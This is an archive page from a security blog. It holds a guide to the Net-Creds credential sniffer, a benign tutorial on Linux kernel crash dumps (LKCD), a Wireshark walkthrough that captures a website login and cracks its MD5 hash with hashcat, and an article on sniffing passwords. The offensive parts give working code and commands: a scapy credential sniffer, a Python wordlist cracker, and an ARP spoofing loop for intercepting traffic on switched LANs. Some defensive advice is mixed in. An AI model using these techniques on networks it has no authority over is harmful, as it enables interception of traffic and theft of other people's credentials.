Never Ending Security


Category Archives: Log and Monitoring

Net-Creds – Sniffs Sensitive Data From Interface Or Pcap


Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
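
The gist of this approach can be sketched in a few lines of Python: instead of deciding by port number, inspect every TCP payload for credential-like strings. The sketch below is only an illustration of the idea; it assumes scapy is installed and uses made-up regexes, not the ones net-creds actually uses.

import re
from scapy.all import sniff, IP, TCP, Raw

# very rough credential patterns, for illustration only
CRED_RE = re.compile(r'(USER|PASS|LOGIN|password=|pwd=)\s*\S+', re.IGNORECASE)

def inspect(pkt):
    # look at any TCP payload, regardless of source or destination port
    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
        payload = pkt[Raw].load.decode('latin-1', 'replace')
        for match in CRED_RE.finditer(payload):
            print(pkt[IP].src, '->', pkt[IP].dst, match.group(0))

sniff(prn=inspect, store=0)  # capture on the default interface until Ctrl+C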


Sniffs

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 over all supported protocols (HTTP, SMB, LDAP, etc.)
  • Kerberos

Examples

Auto-detect the interface to sniff

sudo python net-creds.py

Choose eth0 as the interface

sudo python net-creds.py -i eth0

Ignore packets to and from 192.168.0.2

sudo python net-creds.py -f 192.168.0.2

Read from pcap

python net-creds.py -p pcapfile

OSX

Credit to epocs:

sudo easy_install pip
sudo pip install scapy
sudo pip install pcapy
brew install libdnet --with-python
mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
sudo pip install pypcap
brew tap brona/iproute2mac
brew install iproute2mac

Then replace line 74 ‘/sbin/ip’ with ‘/usr/local/bin/ip’.


More Info On: https://github.com/DanMcInerney/net-creds


Collecting And Analyzing Linux Kernel Crashes – LKCD


Table of Contents

  1. LKCD – Introduction
    1. How does LKCD work?
  2. LKCD Installation
  3. Basic prerequisites
    1. A Linux operating system configured to use LKCD:
    2. LKCD configuration
  4. LKCD local dump procedure
    1. Required packages
    2. Configuration file
    3. Activate dump process (DUMP_ACTIVE)
    4. Configure the dump device (DUMP_DEVICE)
    5. Configure the dump directory (DUMPDIR)
    6. Configure the dump level (DUMP_LEVEL)
    7. Configure the dump flags (DUMP_FLAGS)
    8. Configure the dump compression level (DUMP_COMPRESS)
    9. Additional settings
    10. Enable core dump capturing
    11. Configure LKCD dump utility to run on startup
  5. LKCD netdump procedure
  6. Configure LKCD netdump server
    1. Required packages
    2. Configuration file
    3. Configure the dump flags (DUMP_FLAGS)
    4. Configure the source port (SOURCE_PORT)
    5. Make sure dump directory is writable for the netdump user
    6. Configure LKCD netdump server to run on startup
    7. Start the server
  7. Configure LKCD client for netdump
    1. Configure the dump device (DUMP_DEV)
    2. Configure the target host IP address (TARGET_HOST)
    3. Configure target host MAC address (ETH_ADDRESS)
    4. Configure target host port (TARGET_PORT)
    5. Configure the source port (SOURCE_PORT)
    6. Enable core dump capturing
    7. Configure LKCD dump utility to run on startup
    8. Start the lkcd-netdump utility
  8. Test functionality
    1. Example of unsuccessful netdump to different network segment
  9. Conclusion
  10. Download

LKCD – Introduction

LKCD stands for Linux Kernel Crash Dump. This tool allows the Linux system to write the contents of its memory when a crash occurs, so that they can be later analyzed for the root cause of the crash.

Ideally, kernels never crash. In reality, the crashes sometimes occur, for whatever reason. It is in the best interest of people using the plagued machines to be able to recover from the problem as quickly as possible while collecting as much data available. The most relevant piece of information for system administrators is the memory dump, taken at the moment of the kernel crash.

How does LKCD work?

You won’t notice LKCD in your daily work. Only when a kernel crash occurs will LKCD kick into action. The kernel crash may result from a kernel panic or an oops or it may be user-triggered. Whatever the case, this is when LKCD begins working, provided it has been configured correctly.

LKCD works in two stages:

Stage 1

This is the stage when the kernel crashes. Or more correctly, a crash is requested, either due to a panic, an oops or a user-triggered dump. When this happens, LKCD kicks into action, provided it has been enabled during the boot sequence.

LKCD copies the contents of the memory to a temporary storage device, called the dump device, which is usually a swap partition, but it may also be a dedicated crash dump collection partition.

After this stage is completed, the system is rebooted.

Stage 2

Once the system boots back up, LKCD is initiated. The startup script responsible for this differs between systems; on a RedHat machine, for instance, LKCD is run by the /etc/rc.sysinit script.

Next, LKCD runs two commands. The first is lkcd config, which we will review in more detail later; this command prepares the system for the next crash. The second is lkcd save, which copies the crash dump data from its temporary storage on the dump device to the permanent storage directory, called the dump directory.

Along with the dump core, an analysis file and a map file are created and copied; we’ll talk about these separately when we review the crash analysis.

A completion of this two-stage cycle signifies a successful LKCD crash dump.

Here’s an illustration:

Illustration

Some reservations:

LKCD is a somewhat old utility. It may not work well with newer kernels.

All right, now that we know what we’re talking about, let us setup and configure LKCD.

LKCD Installation

You will have to forgive me, but I will NOT demonstrate the LKCD installation. There are several reasons for this untactical evasion on my behalf. I do not expect you to forgive me, but I do hope you will listen to my points:

The LKCD installation requires kernel compilation. This is a lengthy and complex procedure that takes quite a bit of time. It is impossible to explain how LKCD can be installed without showing the entire kernel compilation in detail. For now, I will have to skip this step, but I promise you a tutorial on kernel compilation.

Furthermore, the official LKCD documentation does cover this step. In fact, the supplied IBM tutorial is rather good. However, like most advanced technical papers geared toward highly experienced system administrators, it lacks actual usage examples.

Therefore, I will assume you have a working system compiled with LKCD. So the big question is, what now? How do you use this thing?

This tutorial will try to answer the questions in a linear fashion, explaining how to configure LKCD for local and network dumping of the memory core.

Basic prerequisites

A Linux operating system configured to use LKCD:

Most home users will probably not be able to meet this demand. On the other hand, when you think about it, the collection and analysis of kernel crashes is something you will rarely do at home. For home users, kernel crashes, if they ever occur within the limited scope of desktop usage, are just an occasional nuisance, the open-source world equivalent of the BSOD.

However, if you’re running a business, having your mission-critical systems go down can have a negative business impact. This means that you should be running the “right” kind of operating system in your work environment, configured to suit your needs.

LKCD configuration

LKCD dumps the system memory to a device. This device can be a local partition or a network server. We will discuss both options.

LKCD local dump procedure

Required packages

The host must have the lkcdutils package installed.

Configuration file

The LKCD configuration is located under /etc/sysconfig/dump. Back this up before making any changes! We will have to make several adjustments to this file before we can use LKCD. So let us begin.

Activate dump process (DUMP_ACTIVE)

To be able to use LKCD when crashes occur, you must activate it.

DUMP_ACTIVE=”1″

Configure the dump device (DUMP_DEVICE)

You should be very careful when configuring this directive. If you choose the wrong device, its contents will be overwritten when a crash is saved to it, causing data loss.

Therefore, you must make sure that DUMPDEV is linked to the correct dump device. In most cases, this will be a swap partition, although you can use any block device whose contents you can afford to overwrite. Incidentally, this partially explains the somewhat nebulous, historic requirement that a swap partition be 1.5x the size of RAM.

What you need to do is define a DUMPDEV device and then link it to a physical block device; for example, /dev/sdb1. Let's use the LKCD default, which calls for the DUMPDEV directive to be set to /dev/vmdump.

DUMPDEV=”/dev/vmdump”

Now, please check that /dev/vmdump points to the right physical device. Example:

ls -l /dev/vmdump
lrwxrwxrwx 1 root root 5 Nov 6 21:53 /dev/vmdump -> /dev/sda5

/dev/sda5 should be your swap partition or a disposable crash partition. If the symbolic link does not exist, LKCD will create one the first time it is run and will link /dev/vmdump to the first swap partition found in the /etc/fstab configuration file. Therefore, if you do not want to use the first swap partition, you will have to manually create a symbolic link for the device configured under the DUMPDEV directive.

Configure the dump directory (DUMPDIR)

This is where the memory images saved previously to the dump device will be copied and kept for later analysis. You should make sure the directory resides on a partition with enough free space to contain the memory image, especially if you’re saving all of it. This means 2GB RAM = 2GB space or more.

In our example, we will use /tmp/dump. The default is set to /var/log/dump.

DUMPDIR=”/tmp/dump”

And a screenshot of the configuration file in action, just to make you feel comfortable:

Dumpdir

Configure the dump level (DUMP_LEVEL)

This directive defines what part of the memory you wish to save. Bear in mind your space restrictions. However, the more you save, the better when it comes to analyzing the crash root cause.

Value            Action
DUMP_NONE (0)    Do nothing, just return if called
DUMP_HEADER (1)  Dump the dump header and first 128K bytes out
DUMP_KERN (2)    Everything in DUMP_HEADER and kernel pages only
DUMP_USED (4)    Everything except kernel free pages
DUMP_ALL (8)     All memory

Configure the dump flags (DUMP_FLAGS)

The flags define what type of dump is going to be saved. For now, you need to know that there are two basic dump device types: local and network.

Flag          Value
0x80000000    Local block device
0x40000000    Network device

Later, we will also use the network option. For now, we need local.

DUMP_FLAGS=”0x80000000″

Configure the dump compression level (DUMP_COMPRESS)

You can keep the dumps uncompressed (0) or compress them with RLE (1) or GZIP (2); it's up to you. Here we use GZIP:

DUMP_COMPRESS=”2″

I would call the settings above the “must-have” set. You must make sure these directives are configured properly for the LKCD to function. Pay attention to the devices you intend to use for saving the crash dumps.

Additional settings

There are several other directives listed in the configuration file. These are all set to the configuration defaults. You can find a brief explanation of each below. If you find the section inadequate, please email me and I'll elaborate.

These include:

  • DUMP_SAVE=”1″ – Save the memory image to disk
  • PANIC_TIMEOUT=”5″ – The timeout (in seconds) before a reboot after panic occurs
  • BOUNDS_LIMIT=”10″ – A limit on the number of dumps kept
  • KEXEC_IMAGE=”/boot/vmlinuz” – Defines what kernel image to use after rebooting the system; usually, this will be the same kernel used in normal production
  • KEXEC_CMDLINE=”root console=tty0″ – Defines what parameters the kernel should use when booting after the crash; usually, you won’t have to tamper with this setting – but if you have problems, email me.

In general, we’re ready to use LKCD. So let’s do it.

Enable core dump capturing

The first step is to enable core dump capturing. In other words, we need to, in effect, source the configuration file so that the LKCD utility can use the values set in it. This is done by running the lkcd config command, followed by the lkcd query command, which allows you to see the configuration settings.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_DISKDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

To work properly, the LKCD must run on boot. On RedHat machines, you can use the chkconfig utility to achieve this:

chkconfig boot.lkcd on

After the reboot, your machine is ready for crashing … I mean crash dumping. We can begin testing the functionality. However …

Note:

Disk-based dumping may not succeed in all panic situations. For instance, dumping on hung systems is a best-effort attempt. Furthermore, LKCD does not seem to like md RAID devices, which introduces another problem into the equation. To overcome the potentially troublesome situations where you may end up with failed crash collections to local disks, you may want to consider using the network dumping option. Therefore, before we demonstrate the LKCD functionality, we'll study the netdump option first.

LKCD netdump procedure

Netdump procedure is different from the local dump in having two machines involved in the process. One is the host itself that will suffer kernel crashes and whose memory image we want to collect and analyze. This is the client machine. The only difference from a host configured for local dump is that this machine will use another machine for storage of the crash dump.

The storage machine is the netdump server. Like any server, this host will run a service and listen on a port for incoming network traffic specific to LKCD netdump. When crash dumps are sent, they will be saved to the local block device on the server. Another way to describe the relationship between the netdump server and the client is as source and target, if you will: the client is the source, the machine that generates the information; the server is the target, the destination where the information is sent.

We will begin with the server configuration.

Configure LKCD netdump server

Required packages

The server must have the following two packages installed: lkcdutils and lkcdutils-netdump-server.

Configuration file

The configuration file is the same one, located under /etc/sysconfig/dump. Again, back this file up before making any changes. Next, we will review the changes you need to make in the file for the netdump to work. Most of the directives will remain unchanged, so we’ll take a look only at those specific to netdump procedure, on the server side.

Configure the dump flags (DUMP_FLAGS)

This directive defines what kind of dump is going to be saved to the dump directory. Earlier, we used the local block device flag. Now, we need to change it. The appropriate flag for network dump is 0x40000000.

DUMP_FLAGS=”0x40000000″

Configure the source port (SOURCE_PORT)

This is a new directive we have not seen or used before. This directive defines on which port the server should listen for incoming connections from hosts trying to send LKCD dumps. The default port is 6688. When configured, this directive effectively turns a host into a server – provided the relevant service is running, of course.

SOURCE_PORT=”6688″

Make sure dump directory is writable for the netdump user

This step is extremely important. It ensures that the netdump service is able to write to the partitions/directories on the server. The netdump server runs as the netdump user; we need to make sure this user can write to the desired destination (dump) directory. In our case:

install -o netdump -g dump -m 777 -d /tmp/dump

You may also want to ls the destination directory and check the owner:group. It should be netdump:dump. Example:

ls -ld dump
drwxrwxrwx 3 netdump dump 96 2009-02-20 13:35 dump

You may also try getting away with manually chowning and chmoding the destination to see what happens.

Configure LKCD netdump server to run on startup

We need to configure the netdump service to run on startup. Using chkconfig to demonstrate:

chkconfig netdump-server on

Start the server

Now, we need to start the server and check that it’s running properly. This includes both checking the status and the network connections to see that the server is indeed listening on port 6688.

/etc/init.d/netdump-server start
/etc/init.d/netdump-server status

Likewise:

netstat -tulpen | grep 6688
udp 0 0 0.0.0.0:6688 0.0.0.0:* 479 37910 >>
>> 22791/netdump-server

Everything seems to be in order. This concludes the server-side configurations.

Configure LKCD client for netdump

The client is the machine (which can also be a server of some kind) that we want to collect kernel crashes for. When the kernel crashes on this machine, for whatever reason, we want it to send its core to the netdump server. Again, we need to edit the /etc/sysconfig/dump configuration file. Once again, most of the directives are identical to previous configurations.

In fact, by changing just a few directives, a host configured to save local dumps can be converted for netdump.

Configure the dump device (DUMP_DEV)

Earlier, we configured our clients to dump their core to the /dev/vmdump device. A network dump, however, requires an active network interface instead. There are other considerations as well, but we will review them later.

DUMP_DEV=”eth0″

Configure the target host IP address (TARGET_HOST)

The target host is the netdump server, as mentioned before. In our case, it’s the server machine we configured above. To configure this directive – and the one after – we need to go back to our server and collect some information, the output from the ifconfig command, listing the IP address and the MAC address. For example:

inet addr:192.168.1.3
HWaddr 00:12:1b:40:c7:63

Therefore, our target host directive is set to:

TARGET_HOST=”192.168.1.3″

Alternatively, it is also possible to use hostnames, but this requires the use of hosts file, DNS, NIS or other name resolution mechanisms properly set and working.

Configure target host MAC address (ETH_ADDRESS)

If this directive is not set, the LKCD will send a broadcast to the entire neighborhood, possibly inducing a traffic load. In our case, we need to set this directive to the MAC address of our server:

ETH_ADDRESS=”00:12:1b:40:c7:63″

Limitation:

Please note that the netdump functionality is currently limited to the same subnet that the server runs on. In our case, this means /24 subnet. We’ll see an example for this shortly.

Configure target host port (TARGET_PORT)

We need to set this option to what we configured earlier for our server. This means port 6688.

TARGET_PORT=”6688″

Configure the source port (SOURCE_PORT)

Lastly, we need to configure the port the client will use to send dumps over network. Again, the default is 6688.

SOURCE_PORT=”6688″

And image example:

Source port

This concludes the changes to the configuration file.

Enable core dump capturing

Perform the same steps we did during the local dump configuration: run the lkcd config and lkcd query commands and check the setup.

lkcd config
lkcd query

The output is as follows:

Configured dump device: 0xffffffff
Configured dump flags: KL_DUMP_FLAGS_NETDUMP
Configured dump level: KL_DUMP_LEVEL_HEADER| >>
>> KL_DUMP_LEVEL_KERN
Configured dump compression method: KL_DUMP_COMPRESS_GZIP

Configure LKCD dump utility to run on startup

Once again, the usual procedure:

chkconfig lkcd-netdump on

Start the lkcd-netdump utility

Start the utility by running the /etc/init.d/lkcd-netdump script.

/etc/init.d/lkcd-netdump start

Watch the console for successful configuration message. Something like this:

Success

This means you have successfully configured the client and can proceed to test the functionality.

Test functionality

To test the functionality, we will force a panic on our kernel. This is something you should be careful about doing, especially on your production systems. Make sure you backup all critical data before experimenting.

To be able to trigger a panic, you will have to enable the System Request (SysRq) functionality on the desired clients, if it has not already been enabled:

echo 1 > /proc/sys/kernel/sysrq

And then force the panic:

echo c > /proc/sysrq-trigger

Watch the console. The system should reboot after a while, indicating a successful recovery from the panic. Furthermore, you need to check the dump directory on the netdump server for the newly created core, indicating a successful network dump. Indeed, checking the destination directory, we can see the memory core was successfully saved. And now we can proceed to analyze it.

Worked

Example of unsuccessful netdump to different network segment

As mentioned before, the netdump functionality seems limited to the same subnet. Trying to send the dump to a machine on a different subnet results in an error (see screenshot below). I have tested this functionality for several different subnets, without success. If anyone has a solution, please email it to me.

Here’s a screenshot:

Failure

Conclusion

LKCD is a very useful application, although it has its limitations.

On one hand, it provides the critical ability to perform in-depth post-mortem forensics on crashed systems. The netdump functionality is particularly useful in allowing system administrators to save memory images after kernel crashes without relying on internal hard disk space or the hard disk configuration. This can be particularly useful for machines with very large amounts of RAM, where dumping the entire contents of memory to local partitions might be problematic. Furthermore, the netdump functionality works around LKCD's inability to use md partitions, allowing it to be used on hosts configured with RAID.

However, being restricted to the same network segment severely limits the ability to mass-deploy netdump in large environments. It would be extremely useful if a workaround or patch were available so that centralized netdump servers could be used without relying on a specific network topology.

Lastly, LKCD is a somewhat old utility and might not work well on modern kernels. In general, it is fairly safe to say it has been replaced by the more flexible Kdump, which we will review in the next article.

Website Password & User Credentials Sniffing/Hacking Using WireShark


Did you know that every time you fill in your username and password on a website and press ENTER, you are sending your password over the network? Well, of course you know that. How else are you going to authenticate yourself to the website? But (yes, there's a small BUT here), when a website lets you authenticate over HTTP (plaintext), it is very simple to capture that traffic and later analyze it from any machine on the LAN (and even the Internet). That brings us to this website password sniffing guide, which works on any site that uses the HTTP protocol for authentication. To do it over the Internet, you need to be able to sit on a gateway or central hub (a BGP router would do, if you can get access and the traffic is routed through it).

Doing it from a LAN, however, is easy, and at the same time it makes you wonder how insecure HTTP really is. You could be doing this on your roommate's traffic, your work network, or even a school, college, or university network, assuming the network allows broadcast traffic and your LAN card can be set to promiscuous mode.

So let's try this on a simple website. I will hide part of the website name (they are nice people and I respect their privacy). For the sake of this guide, I will show everything done on a single machine. As for you, try it between two VirtualBox/VMware/physical machines.

P.S. Note that some routers don't broadcast traffic, so it might fail on those particular ones.

Step 1: Start Wireshark and capture traffic

In Kali Linux you can start Wireshark by going to

Application > Kali Linux > Top 10 Security Tools > Wireshark

In Wireshark go to Capture > Interface and tick the interface that applies to you. In my case, I am using a Wireless USB card, so I’ve selected wlan0.

Website Password hacking using WireShark - blackMORE Ops - 1

Ideally you could just press the Start button here and Wireshark will start capturing traffic. In case you missed this, you can always start capturing by going back to Capture > Interface > Start.

Website Password hacking using WireShark - blackMORE Ops - 2

Step 2: Filter captured traffic for POST data

At this point Wireshark is listening to all network traffic and capturing it. I opened a browser and signed in to a website using my username and password. When the authentication process was complete and I was logged in, I went back and stopped the capture in Wireshark.

Usually you see a lot of data in Wireshark. However, we are only interested in POST data.

Why POST only?

Because when you type in your username and password and press the Login button, the browser generates a POST request (in short, you're sending data to the remote server).

To filter all traffic and locate POST data, type in the following in the filter section

http.request.method == "POST"

See screenshot below. It is showing 1 POST event.

Website Password hacking using WireShark - blackMORE Ops - 3

Step 3: Analyze POST data for username and password

Now right-click on that line and select Follow TCP Stream.

Website Password hacking using WireShark - blackMORE Ops - 4

This will open a new Window that contains something like this:

HTTP/1.1 302 Found 
Date: Mon, 10 Nov 2014 23:52:21 GMT 
Server: Apache/2.2.15 (CentOS) 
X-Powered-By: PHP/5.3.3 
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" 
Set-Cookie: non=non; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: password=e4b7c855be6e3d4307b8d6ba4cd4ab91; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Set-Cookie: scifuser=sampleuser; expires=Thu, 07-Nov-2024 23:52:21 GMT; path=/ 
Location: loggedin.php 
Content-Length: 0 
Connection: close 
Content-Type: text/html; charset=UTF-8

The username and password fields are in the Set-Cookie lines above (scifuser and password).

So in this case,

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91

But hang on, e4b7c855be6e3d4307b8d6ba4cd4ab91 can’t be a real password. It must be a hash value.

Note that some websites don't hash passwords at all, even during sign-on. For those, you've already got the username and password. In this case, let's go a bit further and identify this hash value.

Step 4: Identify hash type

I will use hash-identifier to find out which type of hash this is. Open a terminal, type in hash-identifier and paste the hash value; hash-identifier will give you possible matches.

See screenshot below:

Website Password hacking using WireShark - blackMORE Ops - 6

Now, one thing is for sure: we know it's not a Domain Cached Credential, so it is most likely an MD5 hash value.
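
hash-identifier makes its first guess mostly from the length and character set of the hash, and that first-cut check is easy to reproduce yourself. A tiny sketch (a 32-character hex string could equally be MD4, NTLM or another 128-bit digest, which is why the tool only lists possible matches):

import re

captured = "e4b7c855be6e3d4307b8d6ba4cd4ab91"

# 32 hexadecimal characters = a 128-bit digest; MD5 is the most common guess
if re.fullmatch(r"[0-9a-fA-F]{32}", captured):
    print("Looks like a 128-bit hex digest, most likely MD5")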

I can crack that using hashcat or cudahashcat.

Step 5: Cracking MD5 hashed password

I can easily crack this simple password using hashcat or similar software.

root@kali:~# hashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat32 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt
(or)
root@kali:~# cudahashcat64 -m 0 -a 0 /root/wireshark-hash.lf /root/rockyou.txt

Because this was a simple password that existed in my password list, hashcat cracked it very easily.
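
If you only want to sanity-check a wordlist against this single hash without firing up hashcat, a few lines of Python do the same job (a minimal sketch using the hash and wordlist path from the commands above):

import hashlib

target = "e4b7c855be6e3d4307b8d6ba4cd4ab91"

with open("/root/rockyou.txt", "r", errors="ignore") as wordlist:
    for candidate in wordlist:
        candidate = candidate.strip()
        if hashlib.md5(candidate.encode()).hexdigest() == target:
            print("Match found:", candidate)
            break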

Cracking password hashes

Website Password hacking using WireShark - blackMORE Ops - 7

Our final outcome looks like this:

  1. username: sampleuser
  2. password: e4b7c855be6e3d4307b8d6ba4cd4ab91:simplepassword

Conclusion

Well, to be honest, it's not feasible for every website owner to implement SSL to secure passwords; some SSL certificates cost up to $1,500 per URL (you can get $10 ones too, but I personally never used those so I can't really comment). But the least website owners (public sites where anyone can register) should do is implement hashing during the login procedure. That way the password is at least hashed, which adds one more hurdle for someone trying to steal website passwords. Actually, it's a big hurdle, as breaking SSL encryption can (theoretically) take 100+ years even with the best supercomputer of today.

Enjoy and use this guide responsibly.

Traffic Analysis and Capture Passwords


ABSTRACT

It is known that Wireshark is a powerful tool that goes far beyond a simple sniffer. What many do not know is that there are several ways to harness the potential of this tool, and this article will introduce them. We will learn to sniff the network effectively, create filters to find only the information we want, see how a black hat would use this tool to steal passwords and, finally, how to use Wireshark to diagnose network problems or check whether a firewall is blocking packets correctly.

INTRODUCTION

Is your password hard to break? It has many characters, you change it with a certain regularity, and yet one day you're surprised to receive accusations of intrusion. Evidence indicates that intrusions into third-party accounts originated from your account, and you have no idea what is happening. That is, someone may have used your account and acted as you. How could this have happened? A strong possibility is that you have been the victim of a "sniffer" attack.

UNDERSTAND THE MAIN CONCEPT

What are sniffers? Well... they are very useful pieces of software; so widespread is their use that even IDS systems are built on top of sniffers. A sniffer is a program that can capture all traffic passing through a segment of a network.

They are programs that allow you to monitor network activity, recording names (usernames and passwords) each time someone accesses other computers on the network.

These programs monitor ("sniff") network traffic to capture access to network services, such as remote mail services (IMAP, POP), remote access (telnet, rlogin, etc.), file transfer (FTP) and so on. Accesses are captured as packets, always with the aim of obtaining the identification needed to access the user's account.

When computers are connected through a hub and information is sent from one computer to another, the data actually reaches all ports of the hub, and therefore all machines. It turns out that only the machine for which the information was intended passes it up to the operating system.

If a sniffer is running on one of the other computers, then even though the information was not destined for that system, the sniffer intercepts it at the network layer, capturing the data and displaying it to the user in a rather unfriendly way. Generally the data is organized by protocol type (TCP, UDP, FTP, ICMP, etc.) and the content of each captured packet can be read.

YOUR PASSWORD CAN BE CAPTURED BY SNIFFERS

Many local area networks (LANs) are configured to share the same Ethernet segment. Virtually any computer on such a network can run a "sniffer" program to "steal" users' passwords. "Sniffers" work by monitoring the flow of communication between computers on the network to find out when someone uses the network services previously mentioned. Each of these services uses a protocol that defines how a session is established, how your account is identified and authenticated, and how the service is used.

To access these services, you first have to log in. It is the login sequence – the part of these authentication protocols that occurs at the beginning of each session – that "sniffers" are interested in, because this is the part that contains your password. Therefore, the attacker only has to filter for the strings in which the password appears.

STEP BY STEP

Currently, almost all environments use switches rather than hubs, which makes sniffing a little more difficult: a switch does not send the data to all ports the way a hub does, but only to the port of the destination host, so if you try to sniff a switched network you will only see broadcast traffic and your own connections. To be able to hear everything without being the network gateway, an ARP spoofing attack is necessary (a sketch of which follows below), or you must flood the switch's CAM table.
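
As an illustration of the former, an ARP spoofing attack essentially keeps telling both sides that your machine owns the other's IP address. This is a hedged sketch only (it assumes scapy, uses made-up addresses, and requires IP forwarding on the attacking machine so the victim keeps working); try it only on networks you are authorized to test:

from scapy.all import ARP, send
import time

victim_ip  = "10.10.10.5"   # hypothetical victim
gateway_ip = "10.10.10.1"   # hypothetical gateway

while True:
    # tell the victim we are the gateway, and tell the gateway we are the victim;
    # scapy fills in our own MAC address as the source hardware address
    send(ARP(op=2, pdst=victim_ip, psrc=gateway_ip), verbose=False)
    send(ARP(op=2, pdst=gateway_ip, psrc=victim_ip), verbose=False)
    time.sleep(2)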

Basic Usage

Now let's get our hands dirty. I'm assuming you already have the program installed; if not, download it. When you start Wireshark, the displayed screen will look something like Figure 1:

Figure 1) Wireshark.

Before you can start capturing packets, we have to define which interface will “listen” to the traffic. Click Capture > Interfaces

Figure 2) Interfaces.

From there, a new window will appear with the list of automatically detected interfaces, simply select the desired interface by clicking the box next to the name of the interface, as in figure 3:

Figure 3) Capture Interfaces.

If you click Start, it will automatically begin capturing. Alternatively, you can just select the interface now and start the capture later if necessary.

When the capture process starts, you will see packets scrolling across the Wireshark screen (the amount varies according to the traffic on your machine/network). It will look something like Figure 4:

Figure 4) Capturing.

To stop the capture, simply click the button, “Stop the running live capture”.

Figure 5) Stop.

It is important to take care if your network is busy: the data stream may even lock up your machine, so it is not advisable to leave Wireshark capturing for a long time. As we will see, we will leave it running only while debugging a connection. The greater the number of packets, the longer it takes to apply a filter, find a packet, and so on.

With this we have the basics of the program: we can set the capture interface and start and stop the capture. The next step is to identify what interests us among the many packets. For this, we will start using filters.

Using Filters

There is a plethora of possible filters, but at this moment we will see just how to filter by IP address, port and protocol.

The filters can be constructed by clicking on "Filter", then selecting the desired filter (there is a short list of pre-defined filters), or by typing directly into the text box. After you create your filter, just click "Apply"; if you want to see the entire list of packets again, just click "Clear", which removes the previously applied filter.

Figure 6) Filter.

I will use a small filter list as an example:

Figure 7) Example by Rafael Souza (RHA Infosec).

It is also possible to group the filters, for example:

ip.src == 10.10.10.1 && tcp.dstport == 80

or, equivalently:

ip.src == 10.10.10.1 and tcp.dstport == 80

Both match packets with source address 10.10.10.1 and destination port 80.

CAPTURING PASSWORDS

Now we will see how passwords can be captured easily, just by listening to traffic. For this example we will use the POP3 protocol, which sends data in clear text over the network. To do this, start capturing packets normally and start a session with your POP3 mail server. If you use a safer protocol such as IMAPS or POP3S and just want to see how the mechanism works, it is possible to connect to POP3 via telnet without having to add or modify an account; simply run the following:

telnet serveremail.com 110
user user@rhainfosec.com
pass rhainfosecpasswd

Now stop the capture, type "pop" in the filter field and click "Apply". That done, you will see only the packets of the POP3 connection. Now right-click on any of them and then click "Follow TCP Stream".

Figure 8) POP3.

This will open a new window with the entire contents of the connection in ASCII. Since the POP3 protocol sends everything in plain text, you can see all the commands executed, including the password.

Figure 9) Pass.

The same approach can be applied to any plain-text connection, such as FTP, telnet, HTTP, etc. Just change the filter and examine the contents of the connection.

Importing External Captures

Servers usually have no graphical environment installed, so you cannot use Wireshark on them directly. If you want to analyze traffic on such a server and cannot install Wireshark, or have no other place to capture this traffic, the best you can do is record the traffic locally with tcpdump and then copy the dump to a machine with Wireshark, where a more detailed analysis can be made.

We will capture everything coming from or going to the host 10.10.10.1 with destination port 80 and save the content in the file capturerafaelsouzarhainfosec.pcap in the local folder where the command was executed. Run on the server:

tcpdump -i eth0 host 10.10.10.1 and dst port 80 -w capturerafaelsouzarhainfosec.pcap

Once you're finished capturing, simply press CTRL+C to stop tcpdump, copy the file to the machine running Wireshark and open it there (File -> Open). Once loaded, you can use the program normally as if the capture had occurred locally.
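
If no machine with Wireshark is at hand, a quick first pass over the copied capture can also be done in Python (a minimal sketch assuming scapy is installed; the file name is the one used in the tcpdump command above):

from scapy.all import rdpcap, TCP, Raw

for pkt in rdpcap("capturerafaelsouzarhainfosec.pcap"):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        data = pkt[Raw].load
        # crude check for HTTP POSTs or form fields that may carry credentials
        if data.startswith(b"POST") or b"password=" in data:
            print(data[:200])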

EVOLUTION OF THINKING

Why steal your password?

There are various reasons that lead people to steal passwords, from simply annoying someone (sending email as you) to performing illegal activities (breaking into other computers, theft of information, etc.). One attraction for crackers is the ability to use other people's identities in these activities.

One of the main reasons attackers try to break into systems and install "sniffers" is to quickly capture as many accounts as possible. The more accounts an attacker has, the easier it is to hide their tracks.

How can you protect yourself?

Do not think that "sniffers" make the entire Internet insecure. Not so. You need to be aware of where the risk is, when you're at risk, and what to do to stay safe.

When your credit card is stolen, or you suspect that someone may be using it improperly, you cancel the card and ask for another. Likewise, since passwords can be stolen, it's critical that you replace them regularly. This precaution limits the amount of time that a stolen password can be used by an attacker.

Never share your password with others. Sharing makes it difficult to know where your password is being used (exposed) and makes unauthorized use harder to detect.

Never give your password to anyone claiming they need access to your account to fix some problem or to investigate a breach of the system. This trick is one of the most effective methods of hacking, known as "social engineering".

Use networks you can trust

Another aspect you should take into consideration is which networks you can trust and which you cannot. Suppose you're traveling and need to access your organization's computers remotely – for example, to pick up a file from your home directory – and all you have available is a LAN house or another organization's network. Are you sure you can trust that network?

If you have no alternative for secure remote access and only have resources such as telnet available, you can "mitigate" the risk by changing your password at the end of each session. Remember that only the first packets (200-300 bytes) of each session carry your login information. Therefore, if you always change your password before logging out, the new password will not have been captured, and the password that was exposed to the network is no longer valid. Of course it is possible to capture everything going across the network, but doing so fills the attacker's file system quickly and is therefore easily discovered.

Why networks remain vulnerable to “sniffers” long?

There are several reasons and there is no quick solution to the problem.

